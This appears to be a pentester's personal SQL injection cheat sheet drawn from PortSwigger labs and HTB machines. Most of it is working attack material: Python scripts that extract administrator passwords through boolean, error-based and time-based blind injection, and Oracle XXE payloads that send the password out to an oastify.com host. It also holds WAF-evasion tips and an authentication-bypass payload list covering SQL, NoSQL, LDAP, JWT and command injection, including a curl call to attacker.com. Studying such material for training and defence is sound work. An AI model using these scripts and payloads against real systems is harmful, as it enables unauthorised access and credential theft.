SQL Injection

SQL Discovery

Note: In some cases, we may have to use the URL encoded version of the payload. An example of this is when we put our payload directly in the URL 'i.e. HTTP GET request'.

Payload	URL Encoded
'	%27
"	%22
#	%23
;	%3B
)	%29

DBMS Identification Error Based

Different DBMSs return distinct error messages when they encounter issues. By triggering errors and examining the specific messages sent back by the database, you can often identify the type of DBMS the website is using.

DBMS	Example Error Message	Example Payload
MySQL	You have an error in your SQL syntax; ... near '' at line 1	'
PostgreSQL	ERROR: unterminated quoted string at or near "'"	'
PostgreSQL	ERROR: syntax error at or near "1"	1'
Microsoft SQL Server	Unclosed quotation mark after the character string ''.	'
Microsoft SQL Server	Incorrect syntax near ''.	'
Microsoft SQL Server	The conversion of the varchar value to data type int resulted in an out-of-range value.	1'
Oracle	ORA-00933: SQL command not properly ended	'
Oracle	ORA-01756: quoted string not properly terminated	'
Oracle	ORA-00923: FROM keyword not found where expected	1'

Methodology

• Use a simple quote or time query to test the parameter.

  • Oracle Database require "from dual" to create a valid query

• Different payloads to discover the SQL Type.

  • SQL Error based injection

    • Force error to determine if vulnerable.

  • SQL Blind injection

    • Boolean based

      • Pay attention for any modification within the website since it could be alter the behavior website or appears certain item

    • Conditional error

      • Force 500 status code error to determine a valid query.

    • SQL Time based Injection

      • Insert a sleep clause to determine if is vulnerable.

• Use order by to match with the total number columns to of the affected query

  • Try different values on the number of columns for example (select 1,2,3) or (select null,null,null) or (select 'abc','def')

• If the database is oracle you has to specify the from dual to make a valid query.

Visible error-based SQL injection

This attack involves using error messages returned from the database to gather information about its structure.

Payload:

'and 1=CAST((select password from users limit 1) as int)--

Common Error Messages and Their Meanings:

• "ERROR: argument of AND must be type boolean, not type integer" → You need to carefully analyze the error message on the fly to adapt the query. Sometimes, the application forces you to use a boolean to retrieve the values.

• "Error: Unterminated string literal started at position 95 in ......" → This means you need to shorten the string value.

Forcing an SQL syntax error.

levering the error message to retrieved the username

Retrieving the administrator's password

Blind SQL Injections

Blind SQL Injection with Conditional Responses (Boolean-Based)

This attack relies on observing how the application conditionally responds when a specific query evaluates to True or False.

Methodology

1. Identify the vulnerable parameter → Inject controlled inputs to determine if the parameter is susceptible to SQL Injection.

2. Analyze the boolean response behavior → Observe how different conditions (True vs. False) modify the application's response.

3. Adapt the script to the boolean response → Structure an automated approach based on the application's response pattern.

4. Determine the length of the target string → Use length-based queries to retrieve the number of characters in the desired data.

5. Extract the data character by character → Iteratively retrieve the content by leveraging the boolean response mechanism.

Automation Script

#!/usr/bin/python3
from string import printable
from pwn import log
import requests
import signal
import sys

def handler(sig, frame):
    logging.info("\n[!] Saliendo...")
    sys.exit(0)

signal.signal(signal.SIGINT, handler)

all_ascii = printable
burp0_url = "https://<SNIF>.web-security-academy.net:443/filter?category=Pets"
p1 = log.progress("Payload")
p2 = log.progress("Retrieved")
extracted_data = ''

# INJECTION TO GET THE LENGHT: ' or (select LENGTH(concat(username,password)) from users limit 1)>=33--
for i in range(1,33):
    for char in all_ascii:
        burp0_cookies = {"TrackingId": "' or (select substring(concat(username,password),{},1) from users limit 1)='{}'-- -".format(i,char), "session": "WrpZoj2wutvDkh7srnxakgKqCgO0pjHW"}
        p1.status(burp0_cookies['TrackingId'])
        r1 = requests.get(burp0_url, cookies=burp0_cookies)
        if("Welcome back!" in r1.text):
            extracted_data += char
            p2.status(extracted_data)
            break

p2.success()
p1.success()

Blind SQL Injection with Conditional Errors

This technique forces the web application to trigger a 500 Internal Server Error to determine if a specific condition in the query is valid, allowing us to extract database information.

Methodology

1. Identify the vulnerable parameter → Inject controlled inputs to determine if the parameter is susceptible to SQL Injection.

2. Force an application error → Inject queries that cause the database to produce an error (500 status code).

3. Adapt the script to conditional errors → Automate the extraction based on response status or application behavior.

4. Determine the length of the target string → Use length-based queries to retrieve the number of characters in the desired data.

5. Extract the data character by character → Iteratively retrieve the content by leveraging the response status mechanism.

Example Payloads

Injection Structure:

'||(select CASE WHEN (CONDITION-HERE) then TO_CHAR(1/0) ELSE '' END from users where username='administrator')||'

Extract password length:

'||(select CASE WHEN LENGTH(password)>=20 then TO_CHAR(1/0) ELSE '' END from users where username='administrator')||'

Extract password value (character by character):

'||(select CASE WHEN substr(password,1,1)='a' then TO_CHAR(1/0) ELSE '' END from users where username='administrator')||'

Automatic script

#!/usr/bin/python3

import requests,signal,sys
from pwn import log
from string import printable

def handler(key,frame):
    print("\t\n [!] Exiting...!!")
    sys.exit(0)

signal = signal.signal(signal.SIGINT,handler)

url = 'https://0ac400ff0447b7bc84ee8b4300a40062.web-security-academy.net/filter?category=Pets'
all_ascii = printable
p1 = log.progress("Payload")
p2 = log.progress("Data")
extracted_data = ''

# Injection to get the password len: '||(select CASE WHEN LENGTH(password)>=20 then TO_CHAR(1/0) ELSE '' END from users where username='administrator')||'
for i in range(1,21):
    for char in all_ascii:
        cookies = {
                "TrackingId": "C0abCpzF2t3k8PB5'||(select CASE WHEN substr(password,{},1)='{}' then TO_CHAR(1/0) ELSE '' END from users where username='administrator')||';".format(i,char),
                "session":"9DbVm4fSalnNL3fX8rSSfU3SCPLAjrb5"
        }
        p1.status(cookies['TrackingId'])
        r1 = requests.get(url,cookies=cookies)
        if(r1.status_code == 500):
           extracted_data += char
           p2.status(extracted_data)
           break;

p2.success()
p1.success()

Blind SQL Injection time based

Identify Time Based

'select 1 from pg_sleep(5)
';(select 1 from pg_sleep(5))
'||(select 1 from pg_sleep(5))

Extract password length

x';select case when LENGTH(password)>19 then pg_sleep(3) else pg_sleep(0) end from users limit 1--

Extract password value

x';select case when substring(username,1,1)='a' then pg_sleep(3) else pg_sleep(0) end from users limit 1--

Automatic script

#!/usr/bin/python3
import requests,sys,signal,time
from string import printable
from pwn import log

def handler(key,frame):
    print("\t\n [!] Exiting....")
    sys.exit(0)

signal = signal.signal(signal.SIGINT,handler)

url = 'https://0a6e00f5031951a486b3acbc001c00bc.web-security-academy.net/filter?category=Pets'
extracted_data = ''
all_ascii= printable

p1 = log.progress("Payload")
p2 = log.progress("Extracted Value")

for i in range(1,21):
    for char in all_ascii:
        cookies = {
                "TrackingId":"x'%3bselect+case+when+substring(password,{},1)%3d'{}'+then+pg_sleep(3)+else+pg_sleep(0)+end+from+users+limit+1--".format(i,char),
                "session":"LVvBoEEI1AZ21DPboHGWnWFMoMiaUCZt"
                }
        p1.status(cookies['TrackingId'])
        start_time = time.time()
        r1 = requests.get(url,cookies=cookies)
        end_time = time.time()
        total_time = end_time-start_time

        if(total_time > 3):
            extracted_data+=char
            p2.status(extracted_data)
            break

p1.success()
p2.success(extracted_data)

Blind SQL injection with out-of-band interaction

#Oracle
' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://v51k9gcznzejgagv2ln5yjityk4bs8gx.oastify.com/"> %remote;]>'),'/l') FROM dual)--

Blind SQL injection with out-of-band data exfiltration

#Oracle
' ||(SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password from users where username='administrator')||'.eq83uzxi8iz21t1en48oj23cj3pudv1k.oastify.com/"> %remote;]>'),'/l') FROM dual)--

Bypass WAF with burpsuite with Hackvector

Hackvertor

Hackvertor is a powerful, versatile tool designed to supercharge your workflows by seamlessly converting, encoding, and transforming text or code.

WAF example response:

To obfuscate the payload Just highlight your input, right-click, then select Extensions > Hackvertor > Encode > dec_entities/hex_entities. finally, send the request.

Authentication bypass

PayloadsAllTheThings/SQL Injection/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

// Inyecciones SQL Clásicas (MySQL, PostgreSQL, MSSQL, etc.)
' OR '1'='1'-- -
' OR 1=1# 
' OR 1=1-- 
admin'-- 
' UNION SELECT 1, 'admin', 'passwordhash'-- -
' OR SLEEP(5)-- - (Time-Based Blind SQLi)

// Variantes con codificación URL (SQLi)
%27%20OR%201%3D1--%20-
%27%20UNION%20SELECT%201,user(),3--%20-

// NoSQL Injection (MongoDB, CouchDB, etc.)
username[$ne]=admin&password[$ne]=admin
{"username": "admin", "password": {"$ne": "Intrusionz3r0"}} 
{"username": {"$ne": null}, "password": {"$ne": null}} 
{"username": "admin", "password": {"$regex": "^.*"}} 
{"$where": "true"} 
{"username": {"$exists": true}, "password": {"$exists": true}}
{"username": "admin", "password": {"$gt": ""}} 

// NoSQL Injection en URL/Formularios
username=admin&password[$gt]=
username[$regex]=^a&password[$ne]=1

// JavaScript/JSON Injection (APIs, Lógica de Aplicación)
admin' || 1==1//
admin' || '1'==='1'//
admin' || 1==1%00
{"username": "admin", "password": {"toString": "1"}} (Abuso de prototipos)

// JWT Token Manipulation
{"alg":"none"} + payload: {"user":"admin","isAdmin":true}

// LDAP Injection (Autenticación LDAP)
*)(uid=*))(|(uid=* 
admin)(&) 
*)(objectClass=*))(&(uid=admin

// OS Command Injection (Ejecución de comandos)
; curl https://attacker.com/exfiltrate
`id > /tmp/exploit`
$(whoami)

// XPath Injection (XML/XPath)
' or 1=1 or 'a'='a
' | //user[username='admin' and password='' or '1'='1']

//Bypass de Autenticación con Lógica de Aplicación
// Cookie Manipulation
Cookie: isAdmin=true; session=legit_session

// Header Injection
X-Forwarded-For: 127.0.0.1

// Técnicas Adicionales
// Bypass de 2FA
' OR (SELECT COUNT(*) FROM users WHERE username='admin')=1-- -

// Bypass de CAPTCHA
captcha=1&username=admin'-- -&password=any

Socket SQLmap

#try connect to socker
wscat -c soc-player.soccer.htb:9000/ws

sqlmap -u 'ws://soc-player.soccer.htb:9000' --data '{"id":"*"}' --batch

Useful Resources

Web Page to test SQL Queries

FREE AI-Enhanced Online MySQL Compiler - For learning & practice

Port Portswigger

SQL injection cheat sheet | Web Security AcademyWebSecAcademy

Miscellaneous

if you are using extractvalue use concat(0x0a, value) to be able to retrived the values and additional use limit and substring to move between the strings and limit the amount of data. Example: Monitored HTB Machine

Mysql Concatenation: group_concat(0x0a,value)

Mysql Limitation value: limit 0,1

ExtractValue example

id=1 or extractvalue(1,(QUERY HERE))-- -
id=1 or extractvalue(1,(select group_concat(schema_name) from information_schema.schemata))-- -